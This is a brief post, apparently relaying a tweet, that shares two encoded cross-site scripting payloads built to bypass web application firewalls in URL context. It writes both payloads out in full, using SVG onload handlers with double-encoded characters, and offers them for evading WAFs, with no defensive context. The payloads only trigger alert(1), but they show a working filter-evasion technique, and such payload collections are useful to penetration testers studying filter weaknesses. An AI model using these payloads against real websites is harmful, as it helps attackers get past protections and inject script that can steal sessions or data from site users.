Two payloads for bypassing WAF in URL context have been shared by @BRuteLogic. The payloads are designed for XSS attacks. The first payload is JavaScript:"<Svg/OnLoad=alert%2525%250A26lpar;1)>" and the second payload is JavaScript:"%250A74Svg/On%250ALoad=alert%2525%250A26lpar;1%2525%250A26rpar;>". These payloads can be used to evade various WAFs in URL context. Full details can be found in the original post: https://t.co/EOEn8Rdiby
Check out the original tweet here: https://twitter.com/XssPayloads/status/1859097932617621719
Subscribe for the latest news: